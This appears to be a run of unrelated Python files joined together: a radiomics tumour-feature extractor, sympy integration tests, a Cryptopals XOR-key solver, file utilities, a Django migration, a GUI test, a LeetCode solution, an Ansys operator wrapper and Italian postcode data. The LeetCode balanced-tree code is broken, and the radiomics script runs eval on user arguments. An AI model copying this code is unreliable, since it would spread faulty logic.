N = len(args.Volume) for _index_ in range(N): Vol = glob.glob( os.path.join(Folder_Vol, f'{args.Volume[_index_]}*'))[0] Seg = glob.glob( os.path.join(Folder_Seg, f'{args.Mask[_index_]}*'))[0] ID = os.path.basename(Vol).split('_')[0] Feature_Table[ID] = {} Feature_Table[ID]['Type'] = 'UTUC' Feature_Table[ID]['Sex'] = data_Table[ID][2] Grade_info = data_Table[ID][4] if ('High' in Grade_info or 'high' in Grade_info): Feature_Table[ID]['Histological grade'] = 'HG' elif ('Low' in Grade_info or 'low' in Grade_info): Feature_Table[ID]['Histological grade'] = 'LG' else: Feature_Table[ID]['Histological grade'] = 'None' if (data_Table[ID][6] == '' or data_Table[ID][6] == None): Feature_Table[ID]['T stage'] = 'None' else: Feature_Table[ID]['T stage'] = data_Table[ID][6] Feature_Table[ID]['Lymph-Invasion'] = data_Table[ID][9] Feature_Table[ID]['tumor'] = glob.glob( os.path.join(Vol, '*.tif'))[0] Feature_Table[ID]['mask'] = glob.glob( os.path.join(Seg, '*.png'))[0] def Extract_features(args): import matplotlib.pyplot as plt global Feature_Table global hyperparameters args.width = eval(args.width) args.level = eval(args.level) Lower_bound = (args.level - (args.width/2)) hyperparameters['setting']['voxelArrayShift'] = Lower_bound extractor = featureextractor.RadiomicsFeatureExtractor(**hyperparameters) extractor.enableImageTypeByName('Wavelet', customArgs={'level':1}) extractor.enableImageTypeByName('Square') extractor.enableImageTypeByName('SquareRoot') extractor.enableImageTypeByName('Logarithm') extractor.enableImageTypeByName('Exponential') extractor.enableImageTypeByName('Gradient', customArgs={'gradientUseSpacing':False}) extractor.enableImageTypeByName('LBP2D', customArgs={'lbp2Dmethod':'default', 'lbp2DRadius':3, 'lbp2DSamples':36}) extractor.enableAllFeatures() for ID in Feature_Table.keys(): imageFilepath = Feature_Table[ID]['tumor'] maskFilepath = Feature_Table[ID]['mask'] img = sitk.ReadImage(imageFilepath) np_img = sitk.GetArrayFromImage(img) np_img = np_img * (args.width/65535) + Lower_bound np_img = np_img.astype(np.int) #plt.imshow(np_img, cmap='gray') #plt.show() IMG = sitk.GetImageFromArray(np_img) features = extractor.execute(IMG, maskFilepath, 255) F = {} print(f'analyzing {ID}') F['Original'] = {} F['Wavelet'] = {} F['Square'] = {} F['SquareRoot'] = {} F['Logarithm'] = {} F['Exponential'] = {} F['Gradient'] = {} F['LBP2D'] = {} for key in features.keys(): #print(f"Compute {key} : {features[key]}") if 'diagnostics' in key: continue if 'original' in key: F['Original'][key.split('original_')[1]] = float(features[key]) continue if 'wavelet' in key: F['Wavelet'][key.split('wavelet-')[1]] = float(features[key]) continue if 'square_' in key: F['Square'][key.split('square_')[1]] = float(features[key]) continue if 'squareroot_' in key: F['SquareRoot'][key.split('squareroot_')[1]] = float(features[key]) continue if 'logarithm_' in key: F['Logarithm'][key.split('logarithm_')[1]] = float(features[key]) if 'exponential' in key: F['Exponential'][key.split('exponential_')[1]] = float(features[key]) continue if 'gradient' in key: F['Gradient'][key.split('gradient_')[1]] = float(features[key]) continue if 'lbp-2D_' in key: F['LBP2D'][key.split('lbp-2D_')[1]] = float(features[key]) continue Feature_Table[ID]['Features'] = F def normalization(): NumberOfpatients = len(list(Feature_Table.keys())) base_ID = list(Feature_Table.keys())[0] F = Feature_Table[base_ID]['Features'] buffer_list = [0.0] * NumberOfpatients for _filter_ in list(F.keys()): feature_types = list(F[_filter_].keys()) for _feature_ in 
feature_types: _index_ = 0 _Max_ = Feature_Table[base_ID]['Features'][_filter_][_feature_] _Min_ = Feature_Table[base_ID]['Features'][_filter_][_feature_] for ID in list(Feature_Table.keys()): feature_value = Feature_Table[ID]['Features'][_filter_][_feature_] buffer_list[_index_] = feature_value print(_filter_, _feature_, feature_value, _Max_, _Min_) if feature_value > _Max_: _Max_ = feature_value if feature_value < _Min_: _Min_ = feature_value _index_ += 1 #Normalize to the range of [0, 1] offset = 0.0 if (_Max_ - _Min_) == 0: continue scale_factor = (1.0 - 0.0)/(_Max_ - _Min_) _index_ = 0 for ID in list(Feature_Table.keys()): Feature_Table[ID]['Features'][_filter_][_feature_] = (offset + scale_factor*(buffer_list[_index_] - _Min_)) _index_ += 1 def save_results(args): json_path = os.path.join(args.output_folder, 'Features.txt') json_file = open(json_path, 'w') json_content = json.dumps(Feature_Table, indent = 4) json_file.writelines(json_content) json_file.close() csv_path = os.path.join(args.output_folder, 'Features.csv') csv_file = open(csv_path, 'w') writer = csv.writer(csv_file, dialect='excel') headers = [] headers.append('Subject') first_key = list(Feature_Table.keys())[0] inner_keys = list(Feature_Table[first_key].keys()) for inner_key in inner_keys: if inner_key == 'Features': Feature_keys = list(Feature_Table[first_key][inner_key].keys()) for Feature_key in Feature_keys: _features_ = list(Feature_Table[first_key][inner_key][Feature_key].keys()) for _feature_ in _features_: headers.append(f'{Feature_key}: ' + _feature_) else: headers.append(inner_key) writer.writerow(headers) _line_ = [] print(f"We totally analyze {len(list(Feature_Table.keys()))} participants") for key in sorted(list(Feature_Table.keys())): _line_ = [] _line_.append(key) inner_keys = list(Feature_Table[key].keys()) for inner_key in inner_keys: if inner_key == 'Features': Feature_keys = list(Feature_Table[key][inner_key].keys()) for Feature_key in Feature_keys: _features_ = list(Feature_Table[first_key][inner_key][Feature_key].keys()) for _feature_ in _features_: _line_.append(Feature_Table[key][inner_key][Feature_key][_feature_]) else: _line_.append(Feature_Table[key][inner_key]) writer.writerow(_line_) csv_file.close() a = zip(*csv.reader(open(csv_path, "r"))) csv.writer(open(csv_path, "w")).writerows(a) def main(): API_description = """ ***** Radiomics Analysis Platform ***** API Name: Radiomics Feature Analysis Version: 1.0 Developer: Email: **************************************** """ parser = argparse.ArgumentParser(prog='Feature_Extraction.py', formatter_class=argparse.RawDescriptionHelpFormatter, description=API_description) parser.add_argument('-input_root', action = 'store', type = str, help = 'The absolute path to input root.') parser.add_argument('-Table', action = 'store', type = str, help = 'The absolute path to the DATA TABLE (*.csv).') parser.add_argument('-Volume', nargs = '+', help = 'ex: -Volume Vol1.tif Vol2.tif ...') parser.add_argument('-Mask', nargs = '+', help = 'ex: -Mask Msk1.png Msk2.png ...') parser.add_argument('-output_folder', action = 'store', help = 'The absolute path to the output folder used to store extracted Feature Table') parser.add_argument('-width', action = 'store', type = str, help = 'window width') parser.add_argument('-level', action = 'store', type = str, help = 'window level') parser.add_argument('-normalize', action = 'store', type = str, help = 'True/False') args = parser.parse_args() assert_paser_valid(args) read_data_Table(args.Table) read_data(args) 
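# Remaining pipeline: extract the radiomics features, optionally min-max
# rescale each feature to [0, 1] across patients, then write the results
# to Features.txt (JSON) and Features.csv.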
Extract_features(args) if args.normalize == 'True': normalization() save_results(args) if __name__ == '__main__': main() import sys sys.path.append(".") import py from sympy import * from sympy.numerics import * from sympy.numerics.functions import * from sympy.numerics.quad import * def test_nintegrate(): from operator import abs # workaround abs / sympy.abs conflict Float.store() Float.setdps(20) pi_ = pi_float() assert nintegrate(lambda x: sin(x), 0, pi_).ae(2) assert nintegrate(lambda x: abs(sin(x)), 0, 10*pi_).ae(20) assert nintegrate(lambda x: sin(x), 0, 10*pi_).ae(0) assert nintegrate(lambda x: 4/(1+x**2), 0, 1).ae(pi_) assert nintegrate(lambda x: 4*sqrt(1-x**2), 0, 1).ae(pi_) Float.revert() def test_nintegrate_infinite(): Float.store() Float.setdps(15) pi_ = pi_float() assert nintegrate(lambda x: 4/(1+x**2), 1, oo).ae(pi_) A = nintegrate(lambda x: 2 * exp(-x**2), 0, oo) B = nintegrate(lambda x: 2 * exp(-x**2), -oo, 0) C = nintegrate(lambda x: 2 * exp(-x**2), -oo, oo) D = nintegrate(lambda x: 2 * exp(-x**2), 1, oo) E = nintegrate(lambda x: 2 * exp(-x**2), -1, oo) F = nintegrate(lambda x: 2 * exp(-x**2), -oo, -1) G = nintegrate(lambda x: 2 * exp(-x**2), -oo, 1) assert A.ae(pi_ ** 0.5) assert A.ae(B) assert C.ae(2*B) assert D.ae(0.27880558528066197650) assert E.ae(3.2661021165303700781) assert F.ae(D) assert G.ae(E) Float.revert() def test_tanhsinh(): Float.store() Float.setdps(15) assert nintegrate(lambda x: x**3, -3, 2, method=1).ae(-16.25) assert nintegrate(lambda x: 2/(1+x**2), -1, 1, method=1).ae(pi_float()) assert nintegrate(lambda x: 2/(1+x**2), 0, oo, method=1).ae(pi_float()) assert nintegrate(lambda x: exp(-x), 0, oo, method=1).ae(1) assert nintegrate(lambda x: 2*exp(-x**2), 0, oo, method=1).ae(sqrt(pi_float())) Float.revert() Set 1/Challenge 3/Cryptopals 01-03b.py #------------------------------------------------------------------------- # # Copyright (c) 2017, # # This software may be distributed in accordance with the MIT License. # See the accompanying LICENSE or https://opensource.org/licenses/MIT. # #------------------------------------------------------------------------- # # This code attempts to solve: https://cryptopals.com/sets/1/challenges/3. # # This version uses simple SHRDLU frequency scoring to determine the key. # The guess with the highest score _should_ produce the correct # input string and XOR key. # # No claims are made on the efficiency of this code. # # Changelog: # 2017 03 20 Initial version. 
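# Approach: try every single-byte key in the printable ASCII range, XOR it
# against the ciphertext, and score each candidate plaintext by summing
# English letter frequencies; the highest-scoring key is taken as the answer.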
# #------------------------------------------------------------------------- # Courtesy of http://www.rinkworks.com/words/letterfreq.shtml SHRDLU = { 'e': 0.1142, 'a': 0.0856, 'i': 0.0794, 'r': 0.0751, 't': 0.0746, 'o': 0.0712, 'n': 0.0641, 's': 0.0555, 'l': 0.0552, 'c': 0.0474, 'u': 0.0366, 'p': 0.0327, 'm': 0.0322, 'd': 0.0313, 'h': 0.0276, 'g': 0.0230, 'b': 0.0212, 'y': 0.0200, 'f': 0.0147, 'v': 0.0107, 'w': 0.0094, 'k': 0.0084, 'x': 0.0035, 'z': 0.0024, 'q': 0.0023, 'j': 0.0015 } #---------------------------------------------------------------------------------- def gen_guesses(bytes): len_bytes = len(bytes) guesses = { } # Assuming Latin ASCII alphabet # Constant time: 0x80 - 0x20 = 0x60 iterations # Worst case O(c * n) => c * O(n) => O(n) for key in range(0x20, 0x80): guess = [ ] score = 0 # Worst case O(n), where n = # of bytes for i in range(len_bytes): xbyte = int(bytes[i], 16) ^ key # Broad bounds for Latin ASCII alphanumericspecial chars if xbyte < 0x20 or xbyte > 0x7E: break letter = chr(xbyte).lower() if letter in SHRDLU.keys(): score += SHRDLU[letter] guess.append(letter) if len(guess) > 0 and score > 0: guesses[key] = (score, guess) return guesses #---------------------------------------------------------------------------------- def highest_score(guesses): key = 0 high = 0 for guess in guesses.keys(): score = guesses[guess][0] if score > high: key = guess high = score return key #---------------------------------------------------------------------------------- if __name__ == '__main__': input = '' input = input.decode('hex') bytes = [elem.encode('hex') for elem in input] guesses = gen_guesses(bytes) key = highest_score(guesses) print "Key: {0} | Score: {1} | String: {2}".format(hex(key), guesses[key][0], ''.join(guesses[key][1])) dacman/core/utils.py """ `dacman.core.utils` ==================================== .. currentmodule:: dacman.core.utils :platform: Unix, Mac :synopsis: Module containing several utility functions .. 
moduleauthor:: <> """ import yaml import os import time import hashlib import sys import logging DACMAN_STAGING_LOC = os.path.join(os.getenv('HOME'), '.dacman/data') def dump_yaml(data, filepath): with open(filepath, 'w') as f: yaml.dump(data, f, default_flow_style=False) def update_yaml(data, filepath): if os.path.exists(filepath): with open(filepath, 'r') as f: orig_data = yaml.safe_load(f) for new_val in data: if new_val in orig_data: if len(data[new_val]) > 0: for old_val in data[new_val]: orig_data[new_val][old_val] = data[new_val][old_val] else: del orig_data[new_val] else: orig_data[new_val] = data[new_val] dump_yaml(orig_data, filepath) else: dump_yaml(data, filepath) def load_yaml(yaml_file): with open(yaml_file, 'r') as f: data = yaml.safe_load(f) return data def cprint(caller, str): #print("[{}] [{}] {}".format(time.time(), caller, str)) pass def dict_to_file(data, filepath): with open(filepath, 'w') as f: for key in data: line = '{}: {}\n'.format(key, data[key]) f.write(line) def list_to_file(data, filepath): with open(filepath, 'w') as f: for elem in data: line = '{}\n'.format(elem) f.write(line) def file_to_dict(filename): dict_data = {} with open(filename) as f: lines = f.readlines() for line in lines: kv = line.split(':') key = kv[0].strip() dict_data[kv[0].strip()] = kv[1].strip() return dict_data def file_to_dict_list(filename): dict_data = {} with open(filename) as f: lines = f.readlines() for line in lines: kv = line.split(':') key = kv[0].strip() values = kv[1].split() dict_data[key] = values return dict_data def hash_comparison_id(old_path, new_path): hash = hashlib.md5('{}{}'.format(old_path, new_path).encode('utf-8')).hexdigest() return hash def get_hash_id(path): hash = hashlib.md5(path.encode('utf-8')).hexdigest() return hash def get_nfiles(path, stagingdir): scan_file = os.path.join(stagingdir, 'indexes', get_hash_id(path), 'FILEPATHS') with open(scan_file) as f: nlines = sum(1 for line in f) return nlines def dispatch_import_error(module_name, plugin_name=None, abort=None): logger = logging.getLogger(__name__) msg = f'module "{module_name}" is required' if plugin_name: msg += f' by plug-in "{plugin_name}". To enable plug-in "{plugin_name}", install the required dependencies.' 
logger.warn(msg) if abort: sys.exit(1) else: # this should be caught by straight.plugin raise ImportError # Generated by Django 2.1.5 on 2019-01-15 15:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('blogPosts', '0001_initial'), ] operations = [ migrations.AddField( model_name='blogpost', name='author', field=models.CharField(default='Author', max_length=25), ), migrations.AddField( model_name='blogpost', name='body', field=models.TextField(default='Body'), ), migrations.AddField( model_name='blogpost', name='subtitle', field=models.CharField(default='Subtitle', max_length=400), ), migrations.AlterField( model_name='blogpost', name='pub_date', field=models.DateTimeField(verbose_name='Published '), ), ] #!/usr/bin/env python ############################################################################## # Written by: <> # Date: 2009/09/27 # Description: Test accessibility of repeatbutton widget # Use the repeatbuttonframe.py wrapper script # Test the Moonlight RepeatButton sample ############################################################################## # The docstring below is used in the generated log file """ Test accessibility of repeatbutton widget """ # imports from pyatspi import * from strongwind import * from repeatbutton import * from helpers import * from sys import argv from os import path app_path = None try: app_path = argv[1] except IndexError: pass #expected # open the repeatbutton sample application try: app = launchRepeatButton(app_path) except IOError, msg: print "ERROR: %s" % msg exit(2) # make sure we got the app back if app is None: exit(4) # just an alias to make things shorter rbFrame = app.repeatButtonFrame ################ # Check Actions ################ actionsCheck(rbFrame.button, 'Button') ####################### # Check default States ####################### statesCheck(rbFrame.button, 'Button') ##################################### # Mouse click action on repeatbutton ##################################### rbFrame.button.mouseClick() sleep(config.SHORT_DELAY) #statesCheck(rbFrame.button, 'Button', add_states=['focused']) #################################### # Do Click action for repeatbutton #################################### rbFrame.keyCombo('Tab', grabFocus=False, log=False) sleep(config.SHORT_DELAY) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) statesCheck(rbFrame.button, 'Button', add_states=['focused']) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) rbFrame.button.click(log=True) sleep(config.SHORT_DELAY) assertName(rbFrame.label, 'Number of Clicks: 4') ################################### # Do Press action for repeatbutton ################################### rbFrame.press(rbFrame.button, 16) sleep(config.SHORT_DELAY) assertName(rbFrame.label, 'Number of Clicks: 20') print 'INFO: Log written to: %s' % config.OUTPUT_DIR # close application frame window quit(rbFrame) rajshrivastava/LeetCodesrc/110. Balanced Binary Tree.py # Definition for a binary tree node. 
# class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def isBalanced(self, root: TreeNode) -> bool: if not root: return 1 left_height = self.isBalanced(root.left) right_height = self.isBalanced(root.right) if not (left_height and right_height) or abs(left_height - right_height) > 1: return False return max(left_height, right_height) + 1 return self.isBalanced(root) 10-100 """ nodal_fraction_fc ================= """ from ansys.dpf.core.dpf_operator import Operator from ansys.dpf.core.inputs import Input, _Inputs from ansys.dpf.core.outputs import Output, _Outputs, _modify_output_spec_with_one_type from ansys.dpf.core.operators.specification import PinSpecification, Specification """Operators from Ans.Dpf.FEMutils plugin, from "averaging" category """ class nodal_fraction_fc(Operator): """Transform ElementalNodal fields into Nodal fields. Each nodal value is the fraction between the nodal difference and the nodal average. Result is computed on a given node scoping. available inputs: - fields_container (FieldsContainer) - mesh (MeshedRegion) (optional) - scoping (Scoping) (optional) - denominator (FieldsContainer) (optional) available outputs: - fields_container (FieldsContainer) Examples -------- >>> from ansys.dpf import core as dpf >>> # Instantiate operator >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Make input connections >>> my_fields_container = dpf.FieldsContainer() >>> op.inputs.fields_container.connect(my_fields_container) >>> my_mesh = dpf.MeshedRegion() >>> op.inputs.mesh.connect(my_mesh) >>> my_scoping = dpf.Scoping() >>> op.inputs.scoping.connect(my_scoping) >>> my_denominator = dpf.FieldsContainer() >>> op.inputs.denominator.connect(my_denominator) >>> # Instantiate operator and connect inputs in one line >>> op = dpf.operators.averaging.nodal_fraction_fc(fields_container=my_fields_container,mesh=my_mesh,scoping=my_scoping,denominator=my_denominator) >>> # Get output data >>> result_fields_container = op.outputs.fields_container()""" def __init__(self, fields_container=None, mesh=None, scoping=None, denominator=None, config=None, server=None): super().__init__(name="nodal_fraction_fc", config = config, server = server) self._inputs = InputsNodalFractionFc(self) self._outputs = OutputsNodalFractionFc(self) if fields_container !=None: self.inputs.fields_container.connect(fields_container) if mesh !=None: self.inputs.mesh.connect(mesh) if scoping !=None: self.inputs.scoping.connect(scoping) if denominator !=None: self.inputs.denominator.connect(denominator) @staticmethod def _spec(): spec = Specification(description="""Transform ElementalNodal fields into Nodal fields. Each nodal value is the fraction between the nodal difference and the nodal average. 
Result is computed on a given node scoping.""", map_input_pin_spec={ 0 : PinSpecification(name = "fields_container", type_names=["fields_container"], optional=False, document=""""""), 1 : PinSpecification(name = "mesh", type_names=["abstract_meshed_region"], optional=True, document="""the mesh region in this pin is used to perform the averaging, if there is no field's support it is used"""), 3 : PinSpecification(name = "scoping", type_names=["scoping"], optional=True, document="""average only on these nodes, if it is scoping container, the label must correspond to the one of the fields container"""), 6 : PinSpecification(name = "denominator", type_names=["fields_container"], optional=True, document="""if a fields container is set in this pin, it is used as the denominator of the fraction instead of elemental_nodal_To_nodal_fc""")}, map_output_pin_spec={ 0 : PinSpecification(name = "fields_container", type_names=["fields_container"], optional=False, document="""""")}) return spec @staticmethod def default_config(): return Operator.default_config(name = "nodal_fraction_fc") @property def inputs(self): """Enables to connect inputs to the operator Returns -------- inputs : InputsNodalFractionFc """ return super().inputs @property def outputs(self): """Enables to get outputs of the operator by evaluationg it Returns -------- outputs : OutputsNodalFractionFc """ return super().outputs #internal name: nodal_fraction_fc #scripting name: nodal_fraction_fc class InputsNodalFractionFc(_Inputs): """Intermediate class used to connect user inputs to nodal_fraction_fc operator Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> my_fields_container = dpf.FieldsContainer() >>> op.inputs.fields_container.connect(my_fields_container) >>> my_mesh = dpf.MeshedRegion() >>> op.inputs.mesh.connect(my_mesh) >>> my_scoping = dpf.Scoping() >>> op.inputs.scoping.connect(my_scoping) >>> my_denominator = dpf.FieldsContainer() >>> op.inputs.denominator.connect(my_denominator) """ def __init__(self, op: Operator): super().__init__(nodal_fraction_fc._spec().inputs, op) self._fields_container = Input(nodal_fraction_fc._spec().input_pin(0), 0, op, -1) self._inputs.append(self._fields_container) self._mesh = Input(nodal_fraction_fc._spec().input_pin(1), 1, op, -1) self._inputs.append(self._mesh) self._scoping = Input(nodal_fraction_fc._spec().input_pin(3), 3, op, -1) self._inputs.append(self._scoping) self._denominator = Input(nodal_fraction_fc._spec().input_pin(6), 6, op, -1) self._inputs.append(self._denominator) @property def fields_container(self): """Allows to connect fields_container input to the operator Parameters ---------- my_fields_container : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.fields_container.connect(my_fields_container) >>> #or >>> op.inputs.fields_container(my_fields_container) """ return self._fields_container @property def mesh(self): """Allows to connect mesh input to the operator - pindoc: the mesh region in this pin is used to perform the averaging, if there is no field's support it is used Parameters ---------- my_mesh : MeshedRegion, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.mesh.connect(my_mesh) >>> #or >>> op.inputs.mesh(my_mesh) """ return self._mesh @property def scoping(self): """Allows to connect scoping input to the operator - pindoc: average only on 
these nodes, if it is scoping container, the label must correspond to the one of the fields container Parameters ---------- my_scoping : Scoping, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.scoping.connect(my_scoping) >>> #or >>> op.inputs.scoping(my_scoping) """ return self._scoping @property def denominator(self): """Allows to connect denominator input to the operator - pindoc: if a fields container is set in this pin, it is used as the denominator of the fraction instead of elemental_nodal_To_nodal_fc Parameters ---------- my_denominator : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> op.inputs.denominator.connect(my_denominator) >>> #or >>> op.inputs.denominator(my_denominator) """ return self._denominator class OutputsNodalFractionFc(_Outputs): """Intermediate class used to get outputs from nodal_fraction_fc operator Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Connect inputs : op.inputs. ... >>> result_fields_container = op.outputs.fields_container() """ def __init__(self, op: Operator): super().__init__(nodal_fraction_fc._spec().outputs, op) self._fields_container = Output(nodal_fraction_fc._spec().output_pin(0), 0, op) self._outputs.append(self._fields_container) @property def fields_container(self): """Allows to get fields_container output of the operator Returns ---------- my_fields_container : FieldsContainer, Examples -------- >>> from ansys.dpf import core as dpf >>> op = dpf.operators.averaging.nodal_fraction_fc() >>> # Connect inputs : op.inputs. ... >>> result_fields_container = op.outputs.fields_container() """ return self._fields_container jacksmith15/faker from typing import List from .. 
import Provider as AddressProvider def getcities(fulldict): cities = [] for cap in fulldict: for c in fulldict[cap]: cities.append(c[0]) if c[0] not in cities else cities return cities class Provider(AddressProvider): # Converted from: https://download.geonames.org/export/zip/IT.zip cap_city_province = { "67010": [["Barete", "AQ"]], "67012": [["San Giovanni", "AQ"], ["", "AQ"]], "67013": [["Mascioni", "AQ"], ["Campotosto", "AQ"], ["Ortolano", "AQ"], ["", "AQ"]], "67014": [["Capitignano", "AQ"]], "67015": [ ["", "AQ"], ["Marana", "AQ"], ["Cesaproba", "AQ"], ["Aringo", "AQ"], ["", "AQ"], ["Montereale", "AQ"], ["", "AQ"], ], "67017": [["Pizzoli", "AQ"], ["Marruci", "AQ"], ["", "AQ"]], "67019": [["", "AQ"], ["Vigliano", "AQ"], ["Scoppito", "AQ"]], "67020": [ ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Castelnuovo", "AQ"], ["", "AQ"], ["Beffi", "AQ"], ["", "AQ"], ["", "AQ"], ["Calascio", "AQ"], ["Acciano", "AQ"], ["Tussio", "AQ"], ["", "AQ"], ["Navelli", "AQ"], ["Collepietro", "AQ"], ["", "AQ"], ["Civitaretenga", "AQ"], ["", "AQ"], ["", "AQ"], ["Fossa", "AQ"], ["", "AQ"], ["Fontecchio", "AQ"], ["", "AQ"], ["Roccapreturo", "AQ"], ["", "AQ"], ["", "AQ"], ["Carrufo", "AQ"], ["", "AQ"], ["Caporciano", "AQ"], ["", "AQ"], ], "67021": [["Barisciano", "AQ"], ["Picenze", "AQ"]], "67022": [["Capestrano", "AQ"]], "67023": [["", "AQ"]], "67024": [["", "AQ"]], "67025": [["Ofena", "AQ"]], "67026": [["", "AQ"]], "67027": [["Raiano", "AQ"]], "67028": [["", "AQ"]], "67029": [["Secinaro", "AQ"]], "67030": [ ["Barrea", "AQ"], ["Villalago", "AQ"], ["Alfedena", "AQ"], ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Corfinio", "AQ"], ["", "AQ"], ["Cansano", "AQ"], ["", "AQ"], ["Castrovalva", "AQ"], ["Bugnara", "AQ"], ["Introdacqua", "AQ"], ["Ateleta", "AQ"], ["Scontrone", "AQ"], ["Pacentro", "AQ"], ["Vittorito", "AQ"], ["Prezza", "AQ"], ["Campo Di Fano", "AQ"], ["Cocullo", "AQ"], ["Campo Di Giove", "AQ"], ["", "AQ"], ["Roccacasale", "AQ"], ["Opi", "AQ"], ["", "AQ"], ], "67031": [["", "AQ"], ["Roccacinquemiglia", "AQ"]], "67032": [["Pescasseroli", "AQ"]], "67033": [["Pescocostanzo", "AQ"]], "67034": [["", "AQ"]], "67035": [["Bagnaturo", "AQ"], ["", "AQ"]], "67036": [["Rivisondoli", "AQ"]], "67037": [["Roccaraso", "AQ"], ["Pietransieri", "AQ"], ["Aremogna", "AQ"]], "67038": [["Scanno", "AQ"], ["", "AQ"], ["Frattura", "AQ"]], "67039": [ ["", "AQ"], ["Cavate", "AQ"], ["Albanese", "AQ"], ["Sulmona", "AQ"], ["Torrone", "AQ"], ["Marane", "AQ"], ["Arabona", "AQ"], ["", "AQ"], ], "67040": [["Collarmele", "AQ"], ["Ocre", "AQ"], ["San Martino D'Ocre", "AQ"]], "67041": [["", "AQ"], ["Aielli", "AQ"]], "67043": [["Celano", "AQ"]], "67044": [["Cerchio", "AQ"]], "67045": [["Lucoli", "AQ"], ["", "AQ"], ["Casamaina", "AQ"], ["", "AQ"]], "67046": [["", "AQ"], ["S", "AQ"], ["Ovindoli", "AQ"]], "67047": [["", "AQ"]], "67048": [["", "AQ"], ["Rovere", "AQ"], ["", "AQ"]], "67049": [ ["", "AQ"], ["", "AQ"], ["Villagrande", "AQ"], ["", "AQ"], ["Tornimparte", "AQ"], ["", "AQ"], ], "67050": [ ["Ortucchio", "AQ"], ["Roccavivi", "AQ"], ["Castellafiume", "AQ"], ["", "AQ"], ["Forme", "AQ"], ["Villavallelonga", "AQ"], ["Canistro Inferiore", "AQ"], ["Collelongo", "AQ"], ["Pagliara", "AQ"], ["alle Roveto", "AQ"], ["", "AQ"], ["Corona", "AQ"], ["Bisegna", "AQ"], ["Canistro", "AQ"], ["", "AQ"], ["San Vincenzo Valle Roveto Superiore", "AQ"], ["Albe", "AQ"], ["Castronovo", "AQ"], ["", "AQ"], ["Canistro Superiore", "AQ"], ["", "AQ"], ["Morino", "AQ"], ["", "AQ"], ["Rendinara", "AQ"], ["Grancia", "AQ"], ["Carrito", "AQ"], ["", "AQ"], ["", "AQ"], ], "67051": [ ["", "AQ"], 
["Cese", "AQ"], ["Antrosano", "AQ"], ["Santuario Di Pietracquaria", "AQ"], ["Avezzano", "AQ"], ["Paterno", "AQ"], ], "67052": [["", "AQ"], ["Ridotti", "AQ"], ["", "AQ"], ["Balsorano", "AQ"]], "67053": [ ["Capistrello", "AQ"], ["Corcumello", "AQ"], ["Pescocanale", "AQ"], ["Pescocanale Di Capistrello", "AQ"], ], "67054": [["Meta", "AQ"], ["", "AQ"]], "67055": [["", "AQ"], ["", "AQ"]], "67056": [["", "AQ"]], "67057": [["Venere", "AQ"], ["Pescina", "AQ"]], "67058": [["", "AQ"]], "67059": [["Trasacco", "AQ"]], "67060": [["Cappadocia", "AQ"], ["", "AQ"], ["Verrecchie", "AQ"]], "67061": [ ["", "AQ"], ["Pietrasecca", "AQ"], ["Montesabinese", "AQ"], ["", "AQ"], ["Carsoli", "AQ"], ["", "AQ"], ["", "AQ"], ], "67062": [ ["", "AQ"], ["", "AQ"], ["Rosciolo", "AQ"], ["", "AQ"], ], "67063": [["Oricola", "AQ"], ["Civita", "AQ"]], "67064": [["Pereto", "AQ"]], "67066": [["", "AQ"]], "67067": [ ["Scanzano", "AQ"], ["", "AQ"], ["", "AQ"], ["", "AQ"], ], "67068": [["", "AQ"], ["Cappelle", "AQ"], ["", "AQ"]], "67069": [ ["", "AQ"], ["", "AQ"], ["", "AQ"], ["Gallo", "AQ"], ["Tremonti", "AQ"], ["San Donato", "AQ"], ["Tagliacozzo", "AQ"], ["Sorbo", "AQ"], ["", "AQ"], ["", "AQ"], ["Poggetello", "AQ"], ["", "AQ"], ["Roccacerro", "AQ"], ], "67100": [ ["Pagliare", "AQ"], ["Arischia", "AQ"], ["Monticchio", "AQ"], ["San Gregorio", "AQ"], ["San Vittorino", "AQ"], ["Tempera", "AQ"], ["Bagno", "AQ"], ["Preturo", "AQ"], ["Pile", "AQ"], ["Aragno", "AQ"], ["", "AQ"], ["Pianola", "AQ"], ["", "AQ"], ["", "AQ"], ["Coppito", "AQ"], ["Assergi", "AQ"], ["Forcella", "AQ"], ["Onna", "AQ"], ["Santi", "AQ"], ["L'Aquila", "AQ"], ["Paganica", "AQ"], ["", "AQ"], ["", "AQ"], ["Collebrincioni", "AQ"], ["Campo Imperatore", "AQ"], ["Bazzano", "AQ"], ["", "AQ"], ["Camarda", "AQ"], ["Sassa", "AQ"], ], "66010": [ ["Gessopalena", "CH"], ["Pennapiedimonte", "CH"], ["Ari", "CH"], ["", "CH"], ["", "CH"], ["Tollo", "CH"], ["Roccamontepiano", "CH"], ["", "CH"], ["Pretoro", "CH"], ["", "CH"], ["Montenerodomo", "CH"], ["Semivicoli", "CH"], ["", "CH"], ["Lettopalena", "CH"], ["", "CH"], ["Vacri", "CH"], ["", "CH"], ["Terranova", "CH"], ["", "CH"], ["Rapino", "CH"], ["", "CH"], ["", "CH"], ["Miglianico", "CH"], ["Casacanditella", "CH"], ["Castelferrato", "CH"], ["Palombaro", "CH"], ["Colledimacine", "CH"], ["Villamagna", "CH"], ], "66011": [["", "CH"], ["Bucchianico", "CH"]], "66012": [["Casalincontrada", "CH"]], "66014": [["", "CH"], ["Crecchio", "CH"]], "66015": [["", "CH"]], "66016": [ ["", "CH"], ["Comino", "CH"], ["", "CH"], ["Caporosso", "CH"], ["Guardiagrele", "CH"], ], "66017": [["Palena", "CH"]], "66018": [["", "CH"]], "66019": [["Fallascoso", "CH"], ["", "CH"]], "66020": [ ["", "CH"], ["Pollutri", "CH"], ["Villalfonsina", "CH"], ["", "CH"], 